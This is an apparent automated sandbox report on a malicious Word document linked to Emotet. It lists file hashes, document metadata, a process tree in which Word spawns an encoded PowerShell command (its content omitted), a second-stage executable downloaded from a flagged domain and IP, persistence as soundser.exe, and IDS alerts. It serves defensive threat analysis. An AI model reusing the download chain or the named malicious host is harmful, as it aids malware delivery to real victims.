File name: | Doc 543228 318165.doc |
Full analysis: | https://app.any.run/tasks/82bf4c8c-7e29-4d04-93c1-cf7ef020e32e |
Verdict: | Malicious activity |
Threats: | Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even private users get infected in mass spam email campaigns. |
Analysis date: | May 15, 2019, 13:56:30 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
Indicators: | |
MIME: | application/msword |
File info: | Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Title: Movies, Subject: Roads, Author: Lempi Greenholt, Comments: seamless, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Tue May 14 23:43:00 2019, Last Saved Time/Date: Tue May 14 23:43:00 2019, Number of Pages: 1, Number of Words: 29, Number of Characters: 169, Security: 0 |
MD5: | F0B8D0083EFDF5162118FFB7AC7A6944 |
SHA1: | 384BB6E06691E48AA3CEA3D76EC4EC7DF7B24E8D |
SHA256: | EDD7683434BF4B5DCF6E62052C0D260F9CE2824BCD2E7FC527680DC96CF84FA0 |
SSDEEP: | 3072:m77HUUUUUUUUUUUUUUUUUUUTkOQePu5U8qE6Q0DyRv7nG5osJ:m77HUUUUUUUUUUUUUUUUUUUT52VWxDyC |
.doc | Microsoft Word document (54.2)
.doc | Microsoft Word document (old ver.) (32.2)
Manager: | Zemlak |
HeadingPairs: | - |
TitleOfParts: | - |
HyperlinksChanged: | No |
SharedDoc: | No |
LinksUpToDate: | No |
ScaleCrop: | No |
AppVersion: | 16 |
CharCountWithSpaces: | 197 |
Paragraphs: | 1 |
Lines: | 1 |
Company: | Bednar and Sons |
CodePage: | Windows Latin 1 (Western European) |
Security: | None |
Characters: | 169 |
Words: | 29 |
Pages: | 1 |
ModifyDate: | 2019:05:14 22:43:00 |
CreateDate: | 2019:05:14 22:43:00 |
TotalEditTime: | - |
Software: | Microsoft Office Word |
RevisionNumber: | 1 |
LastModifiedBy: | - |
Template: | Normal.dotm |
Comments: | seamless |
Keywords: | - |
Author: | Lempi Greenholt |
Subject: | Roads |
Title: | Movies |
CompObjUserType: | Microsoft Word 97-2003 Document |
CompObjUserTypeLen: | 32 |
PID | CMD | Path | Indicators | Parent process
---|---|---|---|---
2932 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\Doc 543228 318165.doc" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | explorer.exe
 | User: admin; Company: Microsoft Corporation; Integrity Level: MEDIUM; Description: Microsoft Word; Version: 14.0.6024.1000 | | |
2712 | powershell -enc <encoded command omitted> | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | — | wmiprvse.exe
 | User: admin; Company: Microsoft Corporation; Integrity Level: MEDIUM; Description: Windows PowerShell; Exit code: 0; Version: 6.1.7600.16385 (win7_rtm.090713-1255) | | |
3748 | "C:\Users\admin\664.exe" | C:\Users\admin\664.exe | — | powershell.exe
 | User: admin; Company: Lovelysoft; Integrity Level: MEDIUM; Description: Process Manager Remote Server; Exit code: 0; Version: 1.8.0.1800 | | |
2844 | --43274a32 | C:\Users\admin\664.exe | — | 664.exe
 | User: admin; Company: Lovelysoft; Integrity Level: MEDIUM; Description: Process Manager Remote Server; Exit code: 0; Version: 1.8.0.1800 | | |
1140 | "C:\Users\admin\AppData\Local\soundser\soundser.exe" | C:\Users\admin\AppData\Local\soundser\soundser.exe | — | 664.exe
 | User: admin; Company: Lovelysoft; Integrity Level: MEDIUM; Description: Process Manager Remote Server; Exit code: 0; Version: 1.8.0.1800 | | |
2060 | --3ab57678 | C:\Users\admin\AppData\Local\soundser\soundser.exe | — | soundser.exe
 | User: admin; Company: Lovelysoft; Integrity Level: MEDIUM; Description: Process Manager Remote Server; Version: 1.8.0.1800 | | |
PID | Process | Filename | Type | MD5 | SHA256
---|---|---|---|---|---
2932 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVREA10.tmp.cvr | — | — | —
2712 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\4Q196U8BTWTZ5SQ1233W.temp | — | — | —
2932 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm | pgc | A0D7235B4D50FB7CB8D5649C365834BC | 6664D025F0137CE35BCB828739B37400C1214A15AAEA959AB886930CDEB5417F
2932 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\Word8.0\MSForms.exd | tlb | F7822C53AD721458637797EAB9FF82DC | F92DF4352F2DC252D78103B7A962ACB4EF1D0F06ECE5D51F8C0A877B880683B2
2932 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\DBF55D3F.wmf | wmf | 7EBB58F665D41A16CBC122BEA8397D70 | F658FF04F5AEF69F7C54F243F726BAAD1312D5ABC13E19D6AB7E5B118C9FE92A
2932 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\9C3D634.wmf | wmf | ABE208E65C6E510734A4B4D1B51E684D | 5A9BF787E21CB05B32B256F41BE19BFD43100947FA67D16A4CD82C89CF9D4DAC
2932 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\5ABC7E62.wmf | wmf | 158C99AF6EA016698D33894427DE775C | 068B9A016334B15C496E5DCA491D297FEB691CD03F30F913ED1614D9A85AED9C
2844 | 664.exe | C:\Users\admin\AppData\Local\soundser\soundser.exe | executable | EC101DF5494AA9C94FA36EB8CB4C154B | C89521BEAFB0512674AA2379C2B3D088D5E9FC1974993B3DE36B1A5ACDD9D7DF
2932 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\959DB9AD.wmf | wmf | E3441ADDB6CCFA2133AA6667D48E15C3 | 574A5C9309A62733C08D4E406651197CEBAE649F40ABF0E1846B9135D8D5E4AF
2932 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\9CCB2543.wmf | wmf | 9B65CF0D4A58398412C8EC8D16152AA9 | 8CE15822FFCF829484971BBBD8086F328535E55B3EC81398441956D8C82A7E39
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
2712 | powershell.exe | 111.68.113.243:80 | angelyosh.com | Varnion Technology Semesta, PT | ID | suspicious |
Domain | IP | Reputation
---|---|---
angelyosh.com | — | suspicious
PID | Process | Class | Message |
---|---|---|---|
2712 | powershell.exe | Potential Corporate Privacy Violation | ET POLICY PE EXE or DLL Windows file download HTTP |
2712 | powershell.exe | Potentially Bad Traffic | ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download |
2712 | powershell.exe | Misc activity | ET INFO EXE - Served Attached HTTP |